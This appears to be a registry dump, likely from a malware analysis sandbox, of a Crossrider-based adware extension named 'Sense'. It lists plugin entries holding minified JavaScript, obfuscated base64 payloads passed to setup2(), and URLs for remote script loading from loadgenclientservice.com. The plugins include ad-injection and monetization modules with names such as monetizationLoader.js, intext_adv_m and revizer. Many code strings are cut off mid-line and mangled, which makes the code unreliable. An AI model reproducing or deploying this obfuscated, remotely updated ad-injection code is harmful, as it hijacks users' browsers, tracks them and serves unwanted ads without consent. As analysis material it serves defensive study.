"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(a){appAPI.dns={};appAPI.dns.resolveIP=function(b){return a.resolveIp(b);};appAPI.fetchUrl=function(b){return a.fetchUrl(b);};appAPI.openURL=function(e,d){var c;if(typeof e===object){c=e;if(typeof a.openUrlEx!==undefined){a.openUrlEx(appAPI.JSON.stringify(c));return;}else{d=c.where;e=c.url;}}if(typeof e!==string){console.error(appAPI.openURL - Invalid parameter. Expected string (1st param) but got: (typeof e));return;}if(d!==current&&d!==tab&&d!==window&&d!==popup){console.error(appAPI.openURL - Invalid parameter. Expected current/tab/window (2nd param) but got: d);return;}if(typeof a.openUrlEx!==undefined){var f=(document&&document.documentElement&&document.documentElement.clientHeight)?document.documentElement.clientHeight 100:100;var h=(document&&document.documentElement&&document.documentElement.clientWidth)?document.documentElement.clientWidth 80:100;var g=(window&&window.screenTop)?((window.screenTop-20)
[HKCU\Software\Sense\Plugins\72]
"JavaScript" = "if(appAPI.__should_activate_validation__===true){(function(){var e={WRONG_STRICT_VALUE:Parameter %PARAM_NAME% value is not supported.,WRONG_TYPE:Parameter %PARAM_NAME% is of wrong type. Valid types: [%VALID_TYPES%].,PARAM_IS_MANDATORY:Parameter %PARAM_NAME% is mandatory.,DB_VAL_TOO_LARGE:appAPI.db storage is limited to 1000 bytes per key. For larger values please use appAPI.db.async};var a=function(m){return m.charAt(0).toUpperCase() m.slice(1);};var h={};var b=appAPI.appInfo.name;var i=function(o,r,q,p){if(typeof p===undefined){p=;}var n=[ new Date().toDateString() new Date().toLocaleTimeString() ] b;var m=;if(typeof console!==undefined){if((q===e.DB_VAL_TOO_LARGE)&&(typeof console.warn===function)){console.warn(n m);}else{if(typeof console.error===function){console.error(n m);}else{if(typeof console.log===function){console.log(n m);}}}}return;};var l=function(p,n,o){var m=p-"

[HKCU\Software\Sense\Plugins\39]
"Version" = "5"

[HKCU\Software\Sense\Plugins]
"BrowserEventPluginList" = "14,42,41,44,39,38,43,37,64,72"

[HKCU\Software\Sense\Plugins\269]
"Name" = "stats_ie"

[HKCU\Software\Sense\Plugins\39]
"JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(c){appAPI.cookie=function(h,k,f,i){var g=""%@%ZZCR__AJAXZZ$C@R#"";function e(o,q,l,p){if(typeof(o)!==""string""){return false;}var n=appAPI.JSON.stringify(q);var m=new Date(2030,1,1,0,0,0,0);if(l instanceof Date){m=l;}c.setLocalCookie(o,n,m.toUTCString(),p);return true;}function j(m,n){if(m==""InstallerParams""&&n==""Local""){return appAPI.JSON.parse(appAPI.internal.prefs.getChar(""Params""

[HKCU\Software\Sense\Manifest]
"ModeType" = "production"

[HKCU\Software\Sense\Plugins\180]
"Name" = "bpo_serp_m"

[HKCU\Software\Sense\Plugins\46]
"Version" = "5"

[HKCU\Software\Sense\Plugins\239]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWY3YzY3NGYxYjE4MTIwODI3MTMwODU0NTQ0ZDUxMDQxMjBjMDI1YjRiNTkwZjFlMDExYTRiMTk1YzAwMGYxNzAzMGMxYTA0MDI1NjFjMDQxMDU5MWQwOTVjNWQ1MTQ4NDI0ZTU1NDY1YTU1NWQwNjE1NWE1ZTZiNmQ1NDA2MTkwNzFjMTUyZDAwMGQ0NjRjNGU0ZjFiMTgxMjA4MDE1YjRiNTkwZjFlMDExYTRiMTk1YzAwMGYxNzAzMGMxYTA0MDI1NjFjMDQxMDU5MWQwOTVjNWQ1MTQ4NDI0ZTU1NDY1YTU1NWQwNjE1NWE1ZTZiNmQ1NDFlMDEwNjBiMGYxNjNiMDU0NjRjNGU1ZjQwNTU0YTcyNTI0MTQ0NTY0YzFiMTYxZTEyMTExMTAwMDg1NDU0NGQyODRlMDcxYzAxNDMzOTVhNjQ0ZDUzNGM0NjVhMWIwZjA4MWYwMDA4MzkzZjQ0NDI1MjQzMTMxZjAwMDkxYzFiNDgyNzAwMTcxZTQ3NTk1ZDQzMTQ1NzQ4NDY1OTQ0NGI0ZTE2NTM0YjE2MGQxMDBkMGQwNTA2MDgwMTMzMTUwZDEwMDgwMDUxNTQ0ZDU0MzMzOTNiMjAyZTM3MjUzYzI0MzcyOTM0MjczNzM5MzAzMzIwMjkzNjI4MzkyYjI3MjMzYjNmMmEzMjJjNGI0YTU4NTUwMDAwMTIwMTAzMWQwZDBiMWQ1NTViNDQ1MTMxMzIzMDNlMjkyYjIxMzMyZDMyMmIzZjJjMmQzNjI4MmQyZjI1M2IyYjMyMmM0YjFiNDM1MDZiMTk=', 'dvnmslfxra'); }"

[HKCU\Software\Sense\Plugins\93]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/93.js"

[HKCU\Software\Sense\Plugins\38]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/38.js"

[HKCU\Software\Sense\Plugins\43]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/43.js"

[HKCU\Software\Sense\Plugins\263]
"Name" = "intext_5_j_m"

[HKCU\Software\Sense\Plugins\35]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/35.js"
"Name" = "IEAjax"

[HKCU\Software\Sense\Plugins\21]
"JavaScript" = "var CrossriderDebugManager=(function(h){var f={appId:appAPI._cr_config.appID(),url:appAPI._cr_config.debug_app};return h.Class.extend({init:function(){if(appAPI.isMatchPages.apply(this,f.url.debug_page)){h(document).ready(function(){h(body).bindExtensionEvent(debug_request_data,function(j,i){if(i.appId==f.appId){e();}});h(body).bindExtensionEvent(debug_request_reload_background,function(j,i){if(i.appId==f.appId&&appAPI.internal.reloadBackground){appAPI.internal.reloadBackground();}});h(body).bindExtensionEvent(debug_request_reload_plugins,function(j,i){if(i.appId==f.appId){appAPI.resources.requestReload();setTimeout(appAPI.internal.forceUpdate,750);}});h(body).bindExtensionEvent(debug_mode_activate,function(j,i){if(i.appId==f.appId){b(i);}});h(body).bindExtensionEvent(debug_mode_deactivate,function(j,i){if(i.appId==f.appId){d();}});h(body).bindExtensionEvent(debug_request_database,function(j,i){if(i.appId==f.appId){c(i);}});h(body).bindExtensionEvent(debug_request_database_remove,."

[HKCU\Software\Sense\Plugins\281]
"Version" = "2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Sense\Installer]
"ErrorsDomain" = "http://errors.loadgenclientservice.com"
"DefaultBrowser" = "ie"

[HKCU\Software\Sense\Manifest]
"UpdateInterval" = "360"

[HKCU\Software\Sense\Plugins\14]
"Name" = "CrossriderUtils"

[HKCU\Software\Sense\Plugins\182]
"Version" = "3"

[HKCU\Software\Sense\Manifest]
"Name" = "Sense"

[HKCU\Software\Sense\Plugins\47]
"Name" = "resources_background"

[HKCU\Software\Sense\Installer]
"StatsDomain" = "http://stats.loadgenclientservice.com"

[HKCU\Software\Sense\Plugins\262]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDE2ZjU2NDc0YTU0NGUwMzAwMWYwYTMwMDQwYjQ4NGU0YzQ5MWMxZjBlMTU0YzQ4NDUxNzA4MDUxNzBhMTkwZDEzNTY0NzE1NDIwYTFmMGExNzA0MWYwZjBlNWEwMjBlMDA0NDA5MTAxNDQ4MWM0NzVlNWE0ZDA5MWU0YTI5MzgyOTI2MjMzODI3MzkzMzIxMzMzNTM1MjczOTI5MmIyMjNlM2EyOTQ4MDY1YTA2MTg0YjFiMTMwMTRiNTY1ZDQ2NWM0ZDExMTMwZTU4MjkzODI5MjYyMzM4MjczOTMzMjEzMzM1MzUzNTNjM2IyYjI1M2IyODMzMzgzNTUyMWYxMjA3MWYxZjA4MWYwMzU3MmIzMzI4MjYyNDI5MzYyNDJlMmUzMTNlMzQzZDI1MjkzMTM3MmIyNjMxM2UzNDIxMzgzZjM3MjkyZTJlMmIzMzQ5NTg2MTVhNDU1NjQ3NDgxYzE4MWYwNDE4MmYxNzFhNDU1MDU0NGUwMzAwMWYwYTE2NGM0ODQ1MTcwODA1MTcwYTE5MGQxMzU2NDcxNTQyMGExZjBhMTcwNDFmMGYwZTVhMDIwZTAwNDQwOTEwMTQ0ODFjNDc1ZTVhNGQwOTFlNGEyOTM4MjkyNjIzMzgyNzM5MzMyMTMzMzUzNTI3MzkyOTJiMjIzZTNhMjk0ODA2NWEwNjE4NGIxYjEzMDE0YjU2NWQ0NjVjNGQxMTEzMGU1ODI5MzgyOTI2MjMzODI3MzkzMzIxMzMzNTM1MzUzYzNiMmIyNTNiMjgzMzM4MzU1MjFmMTIwNzFmMWYwODFmMDM1NzJiMzMyODI2MjQyOTM2MjQyZTJlMzEzZTM0M2QyNTI5MzEzNzJiMjYzMTNlMzQyMTM4M2YzNzI5MmUyZTJiMzM0OTU4NjE1YTQ1NTY0NzQ4MDQwMDFlMTMwMjE0MmMxMjQ1NTA1NDVlNWQ0NjYxMDc=', 'zevgjtlktk'd-"

[HKCU\Software\Sense\Plugins\14]
"Version" = "11"

[HKCU\Software\Sense\Plugins\28]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/28.js"

[HKCU\Software\Sense\Plugins\262]
"Version" = "1"

[HKCU\Software\Sense\Plugins]
"NewTabPluginList" = "42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,72,28"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "29 CE 23 C2 4B 20 E3 95 CF D7 28 D7 4F 4B BD 28"

[HKCU\Software\Sense\Plugins\242]
"Name" = "price_gong_m"

[HKCU\Software\Sense\Plugins\44]
"Name" = "IEMisc"

[HKCU\Software\Sense\Plugins]
"AppPluginList" = "246,42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,182,183,207,72,7,9,93,102,123,180,184,191,192,220,221,223,239,242,244,262,263,281,177,91,28"

[HKCU\Software\Sense\Plugins\43]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}if(typeof appAPI.internal.message===undefined){appAPI.internal.message={};}appAPI.internal.message.send=function(b){if(typeof b!==object){return false;}if(typeof b.eventName!==string){return false;}b.senderTabId=appAPI.tabId;var c;try{c=appAPI.JSON.stringify(b);}catch(a){console.error(appAPI.message error - Caught a JSON exception when trying to stringify the message);return false;}if(typeof c!==string){console.error(appAPI.message error - Failed to stringify message);return false;}if(c.length>8192){console.error(appAPI.message error - can't send message because content is too long: c.length);return false;}appAPIinternal.msgToAllTabs(c);return true;};appAPI.internal.callbacks.crossBhoEvent=function(b){if(typeof b.msgObj!==string){return;}try{b=appAPI.JSON.parse(b.msgObj);}catch(c){console.error(Failed to pars-"

[HKCU\Software\Sense\Plugins\91]
"Name" = "monetizationLoader.js"

[HKCU\Software\Sense\Plugins\9]
"Version" = "3"

[HKCU\Software\Sense\Plugins\22]
"Version" = "5"

[HKCU\Software\Sense\Plugins\281]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/281.js"

[HKCU\Software\Sense\Plugins\191]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTE3OTc5NGEwYzA0MDUxZTM5MDAwNjUxNGE0ODQ2MTgwNTFhMWM0ODQ1NWMxMzAxMTEwNjFlNDAwZjFkMDc1YzFkMGQwMDE5MTA0MTBlMWQwNTE4MWQwOTE2MWIxZDBiMTg1ZDFhMDExOTBiMDEwMzAxMGYxZTAwMDUwNDVlMDUwZDFlNWYwNDFmNTA0Njc5Nzk0YTBjMDQwNTFlMWYyNzE4MWY1MjUyNDQ1MjE5MWExODAyMTk0OTVmNDcxNzE1MTIxYjFlMTc0NDEwMTkxZDEyMWY1ZjBkMDMxZjQ1MWUxNTBjMGQxMTVlMGMwMzFkMDExZTExMWEwZjFjMTQxYTQzMDIxODFhMTMwZDE3MDAxMDFjMWUxZDFkNWQxZDAxMGE1ZTFiMWQ0ZTVlNjA3YTUyMTgwODA1MTYwNzAyM2IwZTUxNGE0ODU1NDk0MDQyNjY1MjRhNTM1MDRhMGQxZTFkMDcwMjE3MjAyMDUyNTI0NDUyMTgwODRjNWExZTBhMDAwZDBiMTY1MTE5MDUxYzBlMWMwNzQ2M2IxMzE4MWIxYTFkMWEwMTE1MGUxNzUwNGM1MzUxNTI0ZDA2MWUwYzAxMTYxODAwMDkxNjRkNWE1MDFmMGQxZTE1MDExYjVjMzUxMDE5MWQxMjFmMDExYzA5MTQxOTUzNGQ0ODFmMGQ0YTRlNGMwNTAzMWQxNDA3MTM1ZTJlMGQwNTA3MWMxYzAwMWEwMTE2MDI0MDFjMDAwMzEwMTUxYjE0MTEwMzFjMDMwNTRhNGU1MDEzNDMxMzEwMDMxYzEzMDMxNDFlNGY1ZTUwNTYwZDFlMWQxOTAwMDIwMTAwMTUwMzMxMzMzMTM4M2MyMzNiMzYzOTM1MmIzZTJkMmYyYjI0MmQyYTM0MzQyYTMzMjEzZjMxMmYyMTIwMmYyZTQ5NDA1MjRkMDYwNTAxMDA1NzRiNGU0YjJkMzUzMDIyMjczNzIzMjMx-"

[HKCU\Software\Sense\Plugins\45]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.tabId=onRequest;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;(function(){function a(e){var c=appAPI.internal.prefs.getChar(e,Crossrider\\onRequest);if(typeof c!==string){return 0;}if(c.length===0){return 0;}c=appAPI.JSON.parse(c);if(typeof c!==object){return 0;}var d=0;for(var b in c){d ;appAPI.internal.callbacks.addListener(onRequest,function(m,g){var n=appAPI.internal.callbacks.onRequest.listenersAdditionalData[g];if(typeof n.code!==string){return;}var f={};var i;if(typeof n.value===undefined){i=undefined;}else{if(n.value===n-"

[HKCU\Software\Sense\Plugins\182]
"JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var c={DUMMY_PAGE_URL:http://page.our-app.net/blank/resource.html};(function(){if(appAPI&&appAPI.internal&&appAPI.internal.hosts&&typeof appAPI.internal.hosts.dummyPageUrl===string&&appAPI.internal.hosts.dummyPageUrl.length>0){c.DUMMY_PAGE_URL=appAPI.internal.hosts.dummyPageUrl;}}());appAPI.openURL=(function(){var d=appAPI.openURL;var e=function(g){d({url:c.DUMMY_PAGE_URL ?appid= appAPI.appInfo.id &resourcepath= escape(g.resourcePath) &rnd= (new Date()).getTime(),where:g.where,focus:g.focus,focusTimer:g.focusTimer,left:g.left,top:g.top,height:g.height,width:g.width});};var f=function(g){if(!appAPI.utils.isObject(g)){return;}if(!appAPI.utils.isDefined(g.resourcePath)){d(g);return;}e(g);};return function(h,g){var i=h;try{if(appAPI.utils.isString(h)){d(h,g);return;}f(i);}catch(j){}};}());var a=function(){(function(){var f=document.createElement(link);f.type=image/x-icon;f.rel=shortcut icon;f.href=;document.getElementsByTagName(head)[0]⁴."

[HKCU\Software\Sense\Plugins\7]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/7.js"

[HKCU\Software\Sense\Installer]
"zdata" = "0"

[HKCU\Software\Sense\Plugins\64]
"JavaScript" = "(function(){var j=__CR_EMPTY_CHANNEL__;var d=function(e){return(typeof e===object&&e!==null);};var b=function(e){return(!!e&&typeof e===string);};var f=function(l){var e;if(typeof l===function){e=j;}else{if(d(l)&&b(l.channel)){e=l.channel;}else{e=j;}}return e;};var k=function(m,e){var l={wrapperMessage:{message:m,channel:f(e)},toIframes:d(e)?e.toIframes:e};return l;};var i=function(m,e){var l={message:m,channel:f(e)};return l;};var h=function(){var e={};e.addListener=appAPI.message.addListener;e.removeListener=appAPI.message.removeListener;e.toActiveTab=appAPI.message.toActiveTab;e.toAllOtherTabs=appAPI.message.toAllOtherTabs;e.toAllTabs=appAPI.message.toAllTabs;e.toBackground=appAPI.message.toBackground;e.toCurrentTabIframes=appAPI.message.toCurrentTabIframes;e.toCurrentTabWindow=appAPI.message.toCurrentTabWindow;e.toPopup=appAPI.message.toPopup;return e;};var a=function(e){appAPI.message.addListener=function(l,o){var n=null;var m;var p=f(l);if(typeof l===function){n=function(q){if(p===q.channel){-"

[HKCU\Software\Sense\Plugins\221]
"Version" = "4"

[HKCU\Software\Sense\Plugins\14]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/14.js"

[HKCU\Software\Sense\Plugins\246]
"Version" = "15"

[HKCU\Software\Sense\Plugins\3]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/3.js"

[HKCU\Software\Sense\Plugins\21]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/21.js"

[HKCU\Software\Sense\Plugins\36]
"Name" = "IEBackground"

[HKCU\Software\Sense\Plugins\4]
"Version" = "5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Sense\Plugins\37]
"Version" = "6"

[HKCU\Software\Sense\Plugins\93]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTE2ZTY4NTUwYzFhMTkxYTI1MTQwNjQ2NWI1NzQ2MDYxOTFlMDA1YzQ1NGIxNjAwMTM0MDFlMWYwMDAzMTgwMjA4MDQwYzQwMGUwNTFkNDkxZDE3NGUwNDAyMzEwMDBiMTkwODQ0MGUxMjA3NWIwYTAxMTkxZjEzMTgwNzA0NGEwYzA2MWIxMDFkMGYwMTEzNDcwMjE3MGIxZjIzMTQ1YjBiMDYwMjUxMjczYTI0MmU0ZDM5MzUyNzMzMzgzNzNkM2YyMzM0MjMzODNiMjQyZjMwMmIyMzJlMzUyMjM1MzczNDM1M2IyNzI5MzUyZjQwMWEwNTEzMDMwYTBiMWYwNDExMGIwZjU5M2UyODI3M2MyMjM5MjMzNDIzMjAyNDI1M2IyZjNkM2EyZjI4MmIyOTI0MjgzYjRjNDE2MDc5NDQwMjEwMTUwNzE3M2IxZjA2NTI1YzRhNDYwOTAzMTAxZTFlNTA1ZjQ5MWQxMzE2NTkxNzFiMWQwZjAyMDAwMzE3MDk1OTA3MDEwMDQ1MDcxNTQ1MTcwNzI4MDkwZjA0MDQ1ZTBjMTkxNDVlMTMwODFkMDIxZjAyMDUwZjU5MDkxZjEyMTQwMDAzMWIxMTRjMTExMjEyMTYyNzA5NTcxMTA0MDk0MjIyMjMyZDJhNTAzNTJmMjUzODJiMzIyNDM2MjcyOTJmMjIzOTJmM2MzNTMyMmEyYTI4MmUyZjM1M2YyNjNlM2UyMDMxMzI0YzAwMDcxODEwMGYxMjE2MDAwYzA3MTU1YjM1M2IyMjI1MmIzZDNlMzgzOTIyMmYzNjNlMzYzNDNlMzIyNDMxMmIyZjNiM2U1NTQ4NjQ2NDQ4MDAwYTFmMDMwODE5MmQwYTRmNTA1MDVmNTk2ZTFj', 'jdawdnmjpf'); }"

[HKCU\Software\Sense\Manifest]
"SetNewTab" = "false"

[HKCU\Software\Sense\Plugins\47]
"JavaScript" = "(function(){appAPI.ready=function(a){appAPI.resources.isReady(a);};}());var CrossRiderResourcesManager=(function(){var C={appId:(function(){var D=appAPI.appInfo;if(D){return appAPI.appInfo.id;}else{return appAPI.appID;}})(),url:{base:{production:[""\x68\x74\x74\x70\x3a\x2f\x2f\x72""

[HKCU\Software\Sense\Plugins\220]
"JavaScript" = "if(appAPI.isBackground){var ICMBaseManager=function(a){return function(){};};}else{var ICMBaseManager=function(a){var b=(function(g){var p=appAPI.isDebugMode();var n=p||appAPI.internal.db.get(icm_debug)||appAPI.dom.location.href.indexOf(icm_inline_debugger)>-1;var k=http://static.icmwebserv.com/mc/;var d={namespace:a.namespace,marketingCampaignID:(function(){var q={LITE:999999,DOWNLOADS:777777,AJILLION:888888}[a.namespace];if(a.source==JS){q=q-1;}return q;})(),campaignID:(function(){try{return appAPI.internal.monetization.getCampaignId();}catch(q){return0;}})(),subID:(function(){try{return appAPI.internal.monetization.getExtendedSubId();}catch(q){try{return appAPI.internal.monetization.getSubId();}catch(q){return100012322500000000;}}})(),IBIC:(function(){try{return appAPI.installer.getUserId();}catch(q){return0;}})(),DBPrefix:(function(){return{LITE:__ICM_LITE__,DOWNLOADS:__ICM_DOWNLOADS__,AJILLION:__ICM_AJILLION__}[a.namespace];})(),RevMode:(function(){return a.revMode||{LITE:2,DOWNLOADS|-"

[HKCU\Software\Sense\Plugins\177]
"Version" = "2"

[HKCU\Software\Sense\Plugins\22]
"JavaScript" = "(function(a){appAPI.queueManager={queue:[],register:function(b){this.queue.push(b);}};appAPI.ready=function(c,b){a.when.apply(null,appAPI.queueManager.queue).then(function(){a.when(appAPI.initializerPlugin.isReady(b)).then(function(){new Function('if (typeof jQuery === undefined) { jQuery = $jquery_171; }(' appAPI.resources.parseIncludeJS(c.toString()) )($jquery_171))();});});};}($jquery_171));var CrossRiderResourcesManager=(function(z){var B={appId:appAPI._cr_config.appID(),url:appAPI._cr_config.resources,env:appAPI.appInfo.environment===staging?staging:production,saveResource:appAPI.time.daysFromNow(90),nextCheck:360,DBNamespace:Resources_,isDebug:appAPI.debugManager.isDebug()&&appAPI.debugManager.getResourcesPath(),isIE7:z.browser.msie&&z.browser.version*1==7},x=new z.Deferred(),h=K(meta)||{},D=K(remote_resources)||{remoteId:0},e=K(queue)||{},g=initialVersion=K(lastVersion)||0;return z.Class.extend({init:function(){appAPI.queueManager.register(x.promise());if(B.isDebug){x.resolve();}el-"

[HKCU\Software\Sense\Code]
"NewTabJavaScript" = ""

[HKCU\Software\Sense\Plugins\78]
"JavaScript" = "if(typeof jQuery!==undefined&&(jQuery)&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){(function(d,c,e){var a,b;d.uaMatch=function(h){h=h.toLowerCase();var g=/(opr)[\/]([\w.] )/.exec(h)||/(chrome)[ \/]([\w.] )/.exec(h)||/(firefox)[ \/]([\w.] )/.exec(h)||/(webkit)[ \/]([\w.] )/.exec(h)||/(opera)(?:.*version|)[ \/]([\w.] )/.exec(h)||/(msie) ([\w.] )/.exec(h)||h.indexOf(trident)>=0&&/(rv)(?::| )([\w.] )/.exec(h)||h.indexOf(compatible)
[HKCU\Software\Sense\Plugins\42]
"Name" = "IEInternal"

[HKCU\Software\Sense\Plugins\102]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGU3OTQzNDk1MTVhNDExODAyMTkwNTI2MTEwNTUzNDA0MzUyMWUxOTAxMDM1OTQ2NWUxMzRkMTMwNDA5MDcxNzEzMDMwMjU0MGExZTEwMDI1YTEwMTEwZDAzNTUwOTExMDAwYzA2MTAxMTAwMDEwZTRkMWEwNTUyMTYxYjAyMDcxZjFmMGY0ZDE1MWYxMTAxM2MzNjJlMzkzMTNmMjUzZTI3M2EyNzJjMjMyNTI2MjgyMjI4M2IzNzI2MmQyZTI5MzYzMjI5MjQzMTJjM2M0ZjEwMGExMzI0MWYxOTE5MTY1ZTM2MmUzOTMxM2YyNTNlMjczYTI3MmMyMzI1MjIyMDI2MzIzYjMyMmUyYzJlMjU0NTE4MWYwOTQ4MmMzYzJhMjMzNTMwMjMyNDI0MzEzNjMxMzYyNDI5MjYyMjI5MjQzMTJjM2M0YjVkNzA0MzUwNTY0ZDU3MWIxNzFkMDEwOTM2MDIxYTRmNGY1MzQxMDEwNTBlMTMwMzRjNDI1YTFhM2MwYTAzMWUxMTE0MDYwNzA2MmMwYTA3MTcxNTRkMDQxYTFlMTYxNzBkNDcxMjE1MGU1ZjE1MWYxMTAxNGMwMzEwMGMwMjAzMTUxZjFjMDMxNzQ3MWIwOTVjMTMxZTBjMWIxZDA2MDU0YzE5MTExNDA0MzIyYTJjMjAzYjNlMjkzMDIyM2YyOTMwMjEzYzJjMjkyZTI2M2UzMjI4MzEyYzMwM2MzMzI1MmEzNDI5MzI1MzEyMTMxOTI1MTMxNzFjMTM1MDJhMmMyMDNiM2UyOTMwMjIzZjI5MzAyMTNjMjgyMTJhM2MzZTM3MjAzMDJjM2M0ZjE5MTMwNzRkMjkzMjM2MjEyYzNhMjIyODJhMzQzMzNmMmEyNjMwMmMyMzI1MmEzNDI5MzI1NzVmNDM0OTUxNWE2OTUwNTY0ZDU1NTExMzA1MDQxZDBhMWUzZjA5NTc0OTQzNTg0MTQ4Njki-"

[HKCU\Software\Sense\Plugins\36]
"Version" = "8"

[HKCU\Software\Sense\Plugins\184]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/184.js"

[HKCU\Software\Sense\Plugins\244]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/244.js"

[HKCU\Software\Sense\Plugins\239]
"Name" = "revizer_ws_dynamic_b2b_safe_m"

[HKCU\Software\Sense\Plugins\47]
"Version" = "3"

[HKCU\Software\Sense\Plugins\242]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/242.js"

[HKCU\Software\Sense\Plugins\35]
"Version" = "4"

[HKCU\Software\Sense\Plugins\183]
"Name" = "tabsWrapper"

[HKCU\Software\Sense\Plugins\223]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGQ2NjY1NWExMjBjMTUxZTJkMTgxYTRlNTY1ODU4MTAxNTFhMDg1MDU5NDMwZjFjMTQ1NjE3MDcwYjBiMTIwODQyMWIxNTE1NGUxZDFiMTgxZjFjMTg1NzRiNGM1NDU4NGY1ZDQ0NTk1YjRlNGY1NzExMWMxZDA2MTkwZDA4NTYxMDBiNWUxZDBkMDgxZjA4NTEyNzI1M2IzMzIxMmIzOTI0MjUyODNkMjgyNzI0MzYyYzJmMzgyODI5M2MyNTJiMzQyYzI3MjMzMjMzMzM1ZTBmMTU1YzMxMjcyOTI0MjMzZjJiMjgzMTI1MmIyYTM1MzczYzNjMjczNDM5MmMyYjI3MzU1NDQwNjY3MTU4MTAxNTFhMDgxOTIzMWUwMDVhNDA1ODQzMDYwYzFlMDYxZjU2NTc1NTFiMDUwMDU2MWMxZjFmMGQxYzFlNTYwMjAxMTU0NTA1MGYxZTExMGEwYzRlNWY0YzVmNDA1YjViNGE0ZjRmNTc1YjU3MWEwNDA5MDAxNzFiMWM0ZjA0MGI1NTA1MTkwZTExMWU0NTNlMzEzYjM4MzkzZjNmMmEzMzNjMjQzYzI3MmYyZTM4MjkzNjNlM2QyNTMxMmIzZjM0MzMyNTNjMjUyNzQ3MWIxNTU3MjkzMzJmMmEzNTJiMzIzYzMxMmUzMzNlMzMzOTJhMjgzZTIwMzkyNzMzMzMzMzVhNTY3MjY4NGMwODA2MDMwYjA1MTYzMzFjNDM1NDU4NTg0NDVmNjYwNQ==', 'vllxzxanxj'); }"

[HKCU\Software\Sense\Plugins\184]
"Version" = "10"

[HKCU\Software\Sense\Plugins\123]
"Name" = "intext_adv_m"

[HKCU\Software\Sense\Plugins\269]
"Version" = "1"

[HKCU\Software\Sense]
"ActiveAppId" = "61915"

[HKCU\Software\Sense\Plugins\17]
"Name" = "jQuery"

[HKCU\Software\Sense\Manifest]
"Manifest" = "NA"

[HKCU\Software\Sense\Plugins\78]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/78.js"

[HKCU\Software\Sense\Plugins\2]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/2.js"

[HKCU\Software\Sense\Plugins\91]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/91.js"

[HKCU\Software\Sense\Plugins\123]
"Version" = "12"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Sense\Plugins\72]
"Version" = "5"

[HKCU\Software\Sense\Plugins\221]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/221.js"
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[221]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(221,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:DOWNLOADS}))();};"

[HKCU\Software\Sense\Plugins\269]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/269.js"

[HKCU\Software\Sense\Plugins\72]
"Name" = "appApiValidation"

[HKCU\Software\Sense\Plugins\13]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/13.js"

[HKCU\Software\Sense\Plugins\37]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.browserEventCode=true;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;appAPI.internal.callbacks.setEventHandler(openURL,function(b){if(appAPI.isActiveTab()){var a={url:b.url,where:b.where,focus:(typeof b.focus===boolean?b.focus:true),height:(typeof b.height===number?b.height:750),width:(typeof b.width===number?b.width:750),top:(typeof b.top===number?b.top:100),left:(typeof b.left===number?b.left:100),focusTimer:(typeof b.focusTimer===number?b.focusTimer:0),focusDelay:(typeof b.focusDelay===number?b.focusDelay:0)};appAPI.-"

[HKCU\Software\Sense\Plugins\9]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/9.js"

[HKCU\Software\Sense\Plugins\41]
"Name" = "IEInfo"

[HKCU\Software\Sense\Plugins\39]
"Name" = "IEDatabase"

[HKCU\Software\Sense\Plugins\244]
"Name" = "engageya_inner_m"

[HKCU\Software\Sense\Plugins\42]
"Version" = "10"

